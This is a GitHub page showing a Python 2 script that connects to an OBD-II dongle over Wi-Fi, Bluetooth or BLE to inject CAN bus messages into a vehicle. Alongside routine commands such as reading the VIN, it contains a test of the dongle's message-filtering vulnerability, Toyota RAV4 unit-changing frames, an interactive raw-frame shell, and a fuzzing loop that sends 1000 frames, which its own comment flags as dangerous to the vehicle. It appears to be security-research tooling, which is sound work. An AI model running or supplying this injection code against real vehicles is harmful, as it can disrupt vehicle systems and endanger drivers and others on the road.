-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathmain.py
215 lines (175 loc) · 6.71 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
import time
from settings import *
from bluetooth import *
import pyble
from OBDPeripheral import MyPeripheral
# Query the dongle configuration by dongle index.
# `dongle` is the index handed to get_config(); the returned dongle_config is
# read further down for its mode, address, port, name and uuid attributes.
# NOTE(review): get_config is presumably supplied by the `settings` star
# import -- confirm.
dongle = 1
dongle_config = get_config(dongle)
def inject_message(mode, client_socket, message, interval=0.5):
    """Send one command to the dongle and show whatever it answers.

    Parameters:
        mode: transport selector -- 0 is Wi-Fi, 1 is classic Bluetooth, any
            other value is handled as BLE.
        client_socket: connection instance; an object with ``send``/``recv``
            for Wi-Fi and Bluetooth, or the connected peripheral for BLE.
        message: data to be sent; a carriage return is appended here.
        interval: waiting time (seconds) between the write and the read.
    """
    if mode in (0, 1):
        # Wi-Fi and classic Bluetooth use the same send/recv calls, so one
        # code path serves both transports.
        client_socket.send(b"%s\r" % message)
        time.sleep(interval)
        data = client_socket.recv(1024)
        # Print one pre-formatted string: a parenthesised two-item print is
        # rendered as a tuple by the Python 2 print statement this file uses.
        print("Received: %r" % (data,))
    else:
        # BLE: client_socket is a peripheral instance
        BLE_write_with_response(client_socket, message, interval)
def BLE_write_with_response(peripheral, value, interval):
    """Write a value to a BLE peripheral, wait, then request a read.

    Parameters:
        peripheral: connected BLE peripheral instance.
        value: command to write; a carriage return is appended here.
        interval: seconds to pause between the write and the read request.

    Uses the module-level ``c_write`` and ``c_read`` characteristics, so both
    must have been assigned before this function is called.
    """
    payload = bytearray(b"%s\r" % value)
    # NOTE(review): the trailing True presumably requests a write *with
    # response*, as the function name suggests -- confirm against pyble.
    peripheral.writeValueForCharacteristic(payload, c_write.instance, True)
    time.sleep(interval)
    peripheral.readValueForCharacteristic(c_read.instance)
def test_input(mode, client_socket):
    """Interactive shell for CAN message testing.

    Prompts repeatedly and forwards every entered line to the dongle via
    inject_message(); entering an empty line ends the session.

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    # iter() with a sentinel keeps calling the prompt until it yields "".
    for line in iter(lambda: raw_input("Sending input:"), ""):
        inject_message(mode, client_socket, line)
def dongle_init(mode, client_socket):
    """Initialise the dongle by sending a fixed sequence of AT commands.

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    # Alternative sequence kept for reference:
    # ['ATE0', 'ATRV', 'ATE1', 'ATH1', 'AT SP 6', 'AT CAF1']
    for command in ("ATZ", "ATH1", "AT SP 6"):
        inject_message(mode, client_socket, command)
        # time.sleep(1)
    # Single-argument, parenthesised prints behave the same as the print
    # statement; print("") emits the blank separator line.
    print("Dongle init finish")
    print("")
def filter_test(mode, client_socket):
    """Test for the message filtering vulnerability.

    Sends the AT-prefixed adapter commands first and then a series of raw
    data payloads, all through inject_message(), in a fixed order.

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    at_commands = ("ATZ", "ATH1", "AT SP 6", "AT SH 191")
    data_frames = (
        "04 00 00", "02 00 00", "00 00 00", "01 00 00", "03 00 00",
        "05 00 00", "07 00 00", "08 00 00", "09 01 00", "10 00 01",
    )
    for command in at_commands + data_frames:
        inject_message(mode, client_socket, command)
        # time.sleep(1)
    print("Filter test finish")
    print("")
def To_KM_L(mode, client_socket):
    """Convert the odometer unit to KM/L (Toyota RAV4).

    Sends a fixed command sequence through inject_message().

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    sequence = ('ATCRA 7C8', 'ATFCSH 7C0', '3E1', 'ATE0', '3BA280')
    for command in sequence:
        inject_message(mode, client_socket, command)
    print("To KM_L finish")
    print("")
def To_MPG(mode, client_socket):
    """Convert the odometer unit to MPG (Toyota RAV4).

    Sends a fixed command sequence through inject_message().

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    # 'ATE0' appears twice in the original sequence; it is kept unchanged.
    cmd_set = ['ATE0', 'ATRV', 'ATCRA 7C8', 'ATFCSH 7C0', '3E1', 'ATE0', '3BA240']
    for cmd in cmd_set:
        inject_message(mode, client_socket, cmd)
    # The completion message previously read "To KM_L finish", a copy-paste
    # slip from To_KM_L that made the two routines indistinguishable in logs.
    print("To MPG finish")
    print("")
def read_VIN(mode, client_socket):
    """Read the VIN with a PID request.

    Sends a run of AT configuration commands followed by the "09 02" request,
    all through inject_message(), which prints each response.

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    setup = ("ATD", "ATE0", "AT AT 0", "ATS0", "ATH0", "ATCAF 1", "AT ST 96", "AT SP 7")
    request = ("09 02",)
    for command in setup + request:
        inject_message(mode, client_socket, command)
    print("Read VIN finish")
    print("")
def fuzz(mode, client_socket):
    """Fuzzing test: send the same message 1000 times in quick succession.

    !!! Dangerous, since this will cause unpredicted consequence to the
    vehicle.

    Parameters:
        mode: transport selector passed through to inject_message().
        client_socket: connection instance passed through to inject_message().
    """
    # Set the message id before any fuzzing traffic is sent.
    inject_message(mode, client_socket, "AT SH 191")
    payload = "04 00 00"  # fuzzing message
    pause = 0.02  # fuzzing speed in seconds
    for _ in range(1000):
        # interval=0: no wait between write and read; pacing is done below.
        inject_message(mode, client_socket, payload, 0)
        time.sleep(pause)
# Main: connect over the transport selected by dongle_config.mode and run one
# test routine. Swap the commented-out calls to pick a different routine.
if dongle_config.mode == 0:
    # Wi-Fi
    HOST = dongle_config.address  # address the TCP connection is opened to
    PORT = dongle_config.port  # TCP port the connection is opened to
    print("Connection: ip=%s, port=%d" % (HOST, PORT))
    # NOTE(review): `socket` is not imported by name in this file; it is
    # presumably provided by one of the star imports -- confirm.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((HOST, PORT))
        # TODO WIFI, perform CAN bus message injection
        dongle_init(0, s)
        # To_MPG(0, s)
        # read_VIN(0, s)
        # filter_test(0, s)
    finally:
        # Release the socket even when connecting or a test routine fails.
        s.close()
elif dongle_config.mode == 1:
    # Classic Bluetooth
    print("Scanning nearby devices...")
    devices = discover_devices(lookup_names=True)
    for addr, name in devices:
        print("%s - %s" % (addr, name))
        if name.strip() == dongle_config.name:
            dongle_config.address = addr
    if dongle_config.address != "":
        client_socket = BluetoothSocket(RFCOMM)
        try:
            # Query the matched dongle. The loop variable `addr` would be the
            # last device scanned (or undefined if none were found), not
            # necessarily the target.
            service_matches = find_service(address=dongle_config.address)
            print(service_matches)
            client_socket.connect((dongle_config.address, dongle_config.port))
            # TODO Bluetooth, perform CAN bus message injection
            dongle_init(1, client_socket)
            # test_input(1, client_socket)
            # read_VIN(1, client_socket)
            # filter_test(1, client_socket)
        finally:
            # Close the socket even when connecting or a test routine fails.
            client_socket.close()
    else:
        print("[!] Device name %s not found!" % dongle_config.name)
else:
    # Bluetooth LE
    cm = pyble.CentralManager()
    if cm.ready:
        target = None
        device_list = []
        p = None
        scan_interval = 50  # number of scans
        for _ in range(scan_interval):
            try:
                target = cm.startScan()
                if target:
                    if target not in device_list:
                        device_list.append(target)
                    if dongle_config.name in str(target):
                        print("Target dongle %s found, connecting to it..." % dongle_config.name)
                        p = cm.connectPeripheral(target)
                        break
            except Exception as e:
                # Best effort: report the failed scan and keep scanning.
                print(e)
        if p is None:
            # Show what was seen so a wrong configured name is easy to spot.
            for d in device_list:
                print(d)
            print("Target Dongle %s not found." % dongle_config.name)
        else:
            target.delegate = MyPeripheral
            try:
                for service in p:
                    print(service)
                    for characteristic in service:
                        print("%s  :  %s" % (characteristic, characteristic.value))
                # get corresponding read/write uuids
                if dongle_config.uuid:
                    # uuid maps a service UUID to [read_uuid, write_uuid];
                    # the first service entry is used.
                    service_uuid = next(iter(dongle_config.uuid))
                    uuid_pair = dongle_config.uuid[service_uuid]
                    read_uuid = uuid_pair[0]
                    write_uuid = uuid_pair[1]
                    # c_write / c_read must stay module-level names:
                    # BLE_write_with_response reads them as globals.
                    c_write = p[service_uuid][write_uuid]
                    c_read = p[service_uuid][read_uuid]
                    p.setNotifyForCharacteristic(True, c_read.instance)
                    # TODO BLE, perform CAN bus message injection
                    dongle_init(2, p)
                    # test_input(2, p)
                    # read_VIN(2, p)
                    # fuzz(2, p)
                    # filter_test(2, p)
                else:
                    # Without UUIDs there are no characteristics to use;
                    # report it instead of failing on `"".instance`.
                    c_write = ""
                    c_read = ""
                    print("[!] No read/write UUIDs configured for dongle %s" % dongle_config.name)
            finally:
                # Always drop the BLE connection, even after a failure.
                cm.disconnectPeripheral(p)
    else:
        print("[!] BLE central manager is not ready")